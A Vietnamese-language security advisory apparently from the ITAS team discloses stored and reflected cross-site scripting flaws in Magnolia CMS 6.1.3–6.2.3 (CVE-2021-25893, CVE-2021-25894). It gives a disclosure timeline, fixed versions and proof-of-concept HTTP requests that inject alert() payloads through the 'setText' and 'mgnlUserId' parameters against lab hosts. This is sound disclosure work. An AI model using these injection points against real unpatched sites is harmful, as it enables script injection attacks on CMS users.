ITAS TEAM PHÁT HIỆN LỖ HỔNG BẢO MẬT TRÊN HỆ THỐNG MAGNOLIA CMS

ITAS TEAM PHÁT HIỆN LỖ HỔNG BẢO MẬT TRÊN HỆ THỐNG MAGNOLIA CMS

Magnolia là một CMS mã nguồn mở, được sử dụng bởi các thương hiệu hàng đầu thế giới để cung cấp trải nghiệm số cho người dùng. ITAS security team đã tìm thấy một số lỗ hổng bảo mật trên Magnolia CMS trong quá trình kiểm tra an ninh mạng cho đối tác của chúng tôi. Các lỗ hổng bao gồm stored và reflected cross site scripting. Các attacker có thể tận dung nguy cơ bảo mật này để tấn công người dùng sử dụng hệ thống dựa trên mã nguồn của Magnolia.

ITAS Team khuyến cáo cá nhân hoặc tổ chức nào đang sử dụng CMS này hãy nhanh chóng khắc phục ngay.

1. THÔNG TIN ỨNG DỤNG

Lỗ hổng: Cross Site Scripting (XSS)
Nhà sản xuất: https://www.magnolia-cms.com/
Phiên bản bị lỗi: Magnolia From 6.1.3 to 6.2.3
Phiên bản sữa lỗi: Magnolia 6.2.4 and 6.1.7
Ngày thông báo lỗi: 2020-11-12
CVE ID: CVE-2021-25893 và CVE-2021-25894
Tác giả: Nhan Le Dinh – nhannl83@gmail.com và ITAS Team

Tiết Lộ Thông Tin

+ 1/10/2020: phát hiện lỗ hổng bảo mật
+ 22/10/2020: Liên hệ và gửi thông tin lỗ hổng cho Magnolia Team
+ 2/11/2020: Magnolia Team xác nhận lỗi
+ 12/11/2020: Magnolia Team công bố bản vá lỗi
+ 21/1/2021: public thông tin

2. THÔNG TIN LỖ HỔNG BẢO MẬT

a. STORED CROSS SITE SCRIPTING ASSET

Tên lỗ hổng bảo mật: Stored cross-site scripting
Điều kiện : Authenticated user – editor user
Mẫu tấn công: <img src=x onerror=alert(1)>
Tên biến : setText
Loại parameter: POST
CVE ID: CVE-2021-25893

PROOF OF CONCEPT
Bước 1: Đăng nhập với tài khoản quyền editor và thực hiện upload asset. Editor user save và publish asset.
Bước 2: Một tài khoản khác đăng nhập Dash Board tại đường link http://192.168.255.200:8080/magnoliaAuthor/.magnolia/ mã độc sẽ được thực thi
Step 3: Một tài khoản khác tìm kiếm các keyword liên quan đến asset và kích hoạt mã độc

REQUEST 1 – Editor User

POST /magnoliaAuthor/.magnolia/admincentral/UIDL/?v-uiId=0 HTTP/1.1
Host: 192.168.255.200:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
Content-Length: 215
Origin: http://192.168.255.200:8080
Connection: close
Referer: http://192.168.255.200:8080/magnoliaAuthor/.magnolia/admincentral
Cookie: JSESSIONID=F94D473DDA3180A0DD83E87A7FA82598; csrf=$2a$12$PMhaQPvk/94lUeTPUHwPEeLD2yZpGDnPDG8WB54qm280kz8WQLCBK

{“csrfToken”:”dfcd7714-430d-4b39-a983-023d71f7a741″,”rpc”:[[“337″,”com.vaadin.shared.ui.textfield.AbstractTextFieldServerRpc”,”setText”,[“Name <img src=x onerror=alert(\”Caption\”)>”,38]]],”syncId”:70,”clientId”:69}

RESPONSE 1 – Editor User

HTTP/1.1 200
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Type: application/json;charset=UTF-8
Content-Length: 157
Date: Wed, 30 Sep 2020 10:46:43 GMT
Connection: close

for(;;);[{“syncId”: 71, “clientId”: 70, “changes” : [], “state”:{}, “types”:{“337″:”27”}, “hierarchy”:{“337”:[]}, “rpc” : [], “meta” : {}, “resources” : {}}]

REQUEST 2 – Editor User

POST /magnoliaAuthor/.magnolia/admincentral/UIDL/?v-uiId=0 HTTP/1.1
Host: 192.168.255.200:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
Content-Length: 215
Origin: http://192.168.255.200:8080
Connection: close
Referer: http://192.168.255.200:8080/magnoliaAuthor/.magnolia/admincentral
Cookie: JSESSIONID=F94D473DDA3180A0DD83E87A7FA82598; csrf=$2a$12$PMhaQPvk/94lUeTPUHwPEeLD2yZpGDnPDG8WB54qm280kz8WQLCBK

{“csrfToken”:”dfcd7714-430d-4b39-a983-023d71f7a741″,”rpc”:[[“337″,”com.vaadin.shared.ui.textfield.AbstractTextFieldServerRpc”,”setText”,[“Name <img src=x onerror=alert(\”Caption\”)>”,38]]],”syncId”:70,”clientId”:69}

RESPONSE 2 – Editor User

POST /magnoliaAuthor/.magnolia/admincentral/UIDL/?v-uiId=0 HTTP/1.1
Host: 192.168.255.200:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
Content-Length: 215
Origin: http://192.168.255.200:8080
Connection: close
Referer: http://192.168.255.200:8080/magnoliaAuthor/.magnolia/admincentral
Cookie: JSESSIONID=F94D473DDA3180A0DD83E87A7FA82598; csrf=$2a$12$PMhaQPvk/94lUeTPUHwPEeLD2yZpGDnPDG8WB54qm280kz8WQLCBK

{“csrfToken”:”dfcd7714-430d-4b39-a983-023d71f7a741″,”rpc”:[[“337″,”com.vaadin.shared.ui.textfield.AbstractTextFieldServerRpc”,”setText”,[“Name <img src=x onerror=alert(\”Caption\”)>”,38]]],”syncId”:70,”clientId”:69}

REQUEST 3 – Super User

POST /magnoliaAuthor/.magnolia/admincentral?v-1601466593762 HTTP/1.1
Host: 192.168.255.200:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 438
Origin: http://192.168.255.200:8080
Connection: close
Referer: http://192.168.255.200:8080/magnoliaAuthor/.magnolia/admincentral
Cookie: JSESSIONID=0BAAB1003F3EBE1200ED51CD622D9FC3; csrf=$2a$12$HDgWuvx52QApjklS8kGHtuWhReR.jXhKy04/AiSMhz9mtlYDrMhQq

v-browserDetails=1&theme=resurface-admincentral&v-appId=magnoliaAuthormagnoliaadmincentral-1830258479&v-sh=864&v-sw=1536&v-cw=1536&v-ch=750&v-curdate=1601466593762&v-tzo=-420&v-dstd=0&v-rtzo=-420&v-dston=false&v-tzid=Asia%2FBangkok&v-vw=1536&v-vh=0&v-loc=http%3A%2F%2F192.168.255.200%3A8080%2FmagnoliaAuthor%2F.magnolia%2Fadmincentral%23app%3Adam%3AjcrBrowser%3B%3A%3A&v-wn=magnoliaAuthormagnoliaadmincentral-1830258479-0.5660530950862448

RESPONSE 3 – Super User

HTTP/1.1 200
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Type: application/json;charset=UTF-8
Content-Length: 52008
Date: Wed, 30 Sep 2020 11:49:53 GMT
Connection: close

… SNIP …

/span>destinations\\tnull\\t<span class=\\\”activation-status icon-status-green color-green\\\” title=\\\”Published\\\”></span><span class=\\\”hidden-for-aria\\\”>Published</span>\\tWed Feb 25 09:59:07 UTC 2015\”}},{\”k\”:\”6\”,\”rhd\”:{\”d\”:0,\”l\”:true},\”d\”:{\”119\”:\”<span class=\\\”v-table-icon-element\\\”><img alt=\\\”thumbnail\\\” src=\\\”/magnoliaAuthor/.imaging/portrait/dam/2c02b051-4601-439c-be60-c6da39929f71/xss.png..2020-09-30-10-46-45.jpg\\\” class=\\\”inline-thumbnail\\\” ></span>Name <img src=x onerror=alert(\\\”Name\\\”)>\”,\”121\”:\”\”,\”123\”:\”<span class=\\\”activation-status icon-status-red color-red\\\” title=\\\”Unpublished\\\”></span><span class=\\\”hidden-for-aria\\\”>Unpublished</span>\”,\”125\”:\”Sep 30, 2020 10:46 AM\”},\”drag-data\”:{\”text\”:\”<span class=\\\”v-table-icon-element\\\”><img alt=\\\”thumbnail\\\” src=\\\”/magnoliaAuthor/.imaging/portrait/dam/2c02b051-4601-439c-be60-c6da39929f71/xss.png..2020-09-30-10-46-45.jpg\\\” class=\\\”inline-thumbnail\\\” ></span>Name <img src=x onerror=alert(\\\”Name\\\”)>\\tnull\\t<span class=\\\”activation-status icon-status-red color-red\\\” title=\\\”Unpublished\\\”></span><span class=\\\”hidden-for-aria\\\”>Unpublished</span>\\tWed Sep 30 10:46:45 UTC 2020\”}}]]],

… SNIP …

IMAGE RESPONSE 3 – SUPER USER

hình

REQUEST 4 – SUPER USER

POST /magnoliaAuthor/.magnolia/admincentral/UIDL/?v-uiId=1 HTTP/1.1
Host: 192.168.255.200:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate

Content-Type: application/json; charset=UTF-8
Content-Length: 142
Origin: http://192.168.255.200:8080
Connection: close
Referer: http://192.168.255.200:8080/magnoliaAuthor/.magnolia/admincentral
Cookie: JSESSIONID=0BAAB1003F3EBE1200ED51CD622D9FC3; csrf=$2a$12$HDgWuvx52QApjklS8kGHtuWhReR.jXhKy04/AiSMhz9mtlYDrMhQq

{“csrfToken”:”b8127889-ba82-40da-bf91-1deed12ae90f”,”rpc”:[[“137″,”com.vaadin.shared.ui.ui.UIServerRpc”,”poll”,[]]],”syncId”:10,”clientId”:10}

RESPONSE 4 – SUPER USER

HTTP/1.1 200
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Type: application/json;charset=UTF-8
Content-Length: 9557
Date: Wed, 30 Sep 2020 11:56:22 GMT
Connection: close

… SNIP ….

“<div class=’title’>Register</div><div class=’path’>/travel/members/registration</div><div class=’excerpt’><excerpt><fragment>… an. Mitglieder erhalten Zugang zu exklusiven Magnolia Travels Inhalten, Tipps und Rabatte. user<strong>name</strong> text User<strong>name</strong> Benutzer<strong>name</strong> password password Password Passwort passwordConfirmation password …</fragment></excerpt></div>”,”218″:”superuser”,”220″:”2015-12-01″},”cs”:{“212″:”supplier”,”214″:”type”,”216″:”title-path-and-excerpt”,”218″:”editors”,”220″:”dates”}},{“k”:”23″,”rs”:”has-path-or-excerpt”,”d”:{“212″:”Pages”,”214″:{“uRL”:”fonticon://MagnoliaIcons/e904″},”216″:”<div class=’title’>Forgotten password</div><div class=’path’>/travel/members/forgotten-password</div><div class=’excerpt’><excerpt><fragment>… password text text Passwort zur&uuml;cksetzen Password change request has been sent to your email. user<strong>name</strong> text User <strong>name</strong> Benutzer<strong>name</strong> email text Email Abschicken Submit Change password Passwort &auml;ndern * …</fragment></excerpt></div>”,”218″:”superuser”,”220″:”2015-11-25″},”cs”:{“212″:”supplier last”,”214″:”type”,”216″:”title-path-and-excerpt”,”218″:”editors”,”220″:”dates”}},{“k”:”24″,”rs”:”has-path-or-excerpt”,”d”:{“212″:”Magnolia assets”,”214″:{“uRL”:”fonticon://MagnoliaIcons/e91f”},”216″:”<div class=’title’><strong>Name</strong> <img src=x onerror=alert(\”Caption\”)></div><div class=’path’>/xss.png</div>”,”218″:”eric”,”220″:”2020-09-30″},”cs”:{“212″:”supplier first last”,”214″:”type”,”216″:”title-path-and-excerpt”,”218″:”editors”,”220″:”dates”}},{“k”:”25″,”rs”:”has-path-or-excerpt”,”d”:{“212″:”configuration”,”214″:{“uRL”:”fonticon://MagnoliaIcons/e92e”},”216″:”<div class=’title’>asset<strong>Name</strong></div><div class=’path’>/modules/dam-app/dialogs/renameAsset/form/tabs/item/fields/assetName</div>”,”218″:”superuser”,”220″:”2015-04-06″},”cs”:{“212″:”supplier first”,”214″:”type”,”216″:”title-path-and-excerpt”,”218″:”editors”,”220″:”dates”}},{“k”:”26″,”rs”:”has-path-or-excerpt”,”d”:{“212″:”configuration”,”214″:{“uRL”:”fonticon://MagnoliaIcons/e92e”},”216″:”<div class=’title’>jcr<strong>Name</strong></div><div class=’path’>/modules/dam-app/dialogs/renameAsset/form/tabs/item/fields/jcrName</div>”,”218″:”superuser”,”220″:”2015-04-06″},”cs”:{“212″:”supplier”,”214″:”type”,”216″:”title-path-and-excerpt”,”218″:”editors”,”220″:”dates”}},{“k”:”27″,”rs”:”has-path-or-excerpt”,”d”:{“212″:”configuration”,”214″:{“uRL”:”fonticon://MagnoliaIcons/e92e”},”216″:

… SNIP …

IMAGE – RESPONSE 4 – SUPER USER

xss

DEMO VIDEO
https://www.youtube.com/embed/2G91-qQtdfE

b. REFLECTED CROSS SITE SCRIPTING

Tên lỗ hổng bảo mật: Reflected cross-site scripting
Đường link bị lỗi : http://192.168.255.110:8080/magnoliaPublic/travel/members/login.html
Mẫu tấn công: <script>alert(1)</script>
Tên biến : mgnlUserId
Loại biến số : Post
CVE ID: CVE-2021-25894

PROOF OF CONCEPT
– Bước 1: Đăng nhập Magnolia public site với tài khoản không tồn tại.
– Bước 2: Attacker thực hiện inject biến username với mã độc javascript

REQUEST 1

POST /magnoliaPublic/travel/members/login.html HTTP/1.1
Host: 192.168.255.110:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 238
Origin: http://192.168.255.110:8080
Connection: close
Referer: http://192.168.255.110:8080/magnoliaPublic/travel/members/login.html
Cookie: JSESSIONID=8888F73376172372D50FC4EA9CD6015A
Upgrade-Insecure-Requests: 1

mgnlModelExecutionUUID=f2e8ea3d-6fc0-4c03-99b8-bc6ccdfeefe4&mgnlReturnTo=%2FmagnoliaPublic%2Ftravel%2Fmembers%2Fprotected.html&csrf=P5w0QkpQ6kpQcYxDroR9V_EyiY0&mgnlUserId=nhanle.itas%3Cscript%3Ealert%281%29%3C%2Fscript%3E&mgnlUserPSWD=123

RESPONSE 1

HTTP/1.1 200
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 15769
Date: Wed, 30 Sep 2020 14:47:55 GMT
Connection: close

… SNIP …

</fieldset>
</form>
</div><!– end form-wrapper –>

<div class=”loginError”>
<p>User account nhanle.itas<script>alert(1)</script> not found.</p>
</div>
</div>
</div>

… SNIP …

IMAGE RESPONSE 1

xss

DEMO VIDEO
https://www.youtube.com/embed/-wwIrt2CDzI

Tuyên bố miễn trừ trách nhiệm
Tác giả không chịu trách nhiệm cho bất kỳ việc lạm dụng thông tin ở trên đây và không chịu trách nhiệm cho bất kỳ thiệt hại nào do việc sử dụng hoặc sử dụng sai mục đích các hướng dẫn này. Tác giả nghiêm cấm mọi hành vi sử dụng các lỗi bảo mật ở trên để khai thác và gây thiệt hại cho các tổ chức ở trên và các tổ chức khác.

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *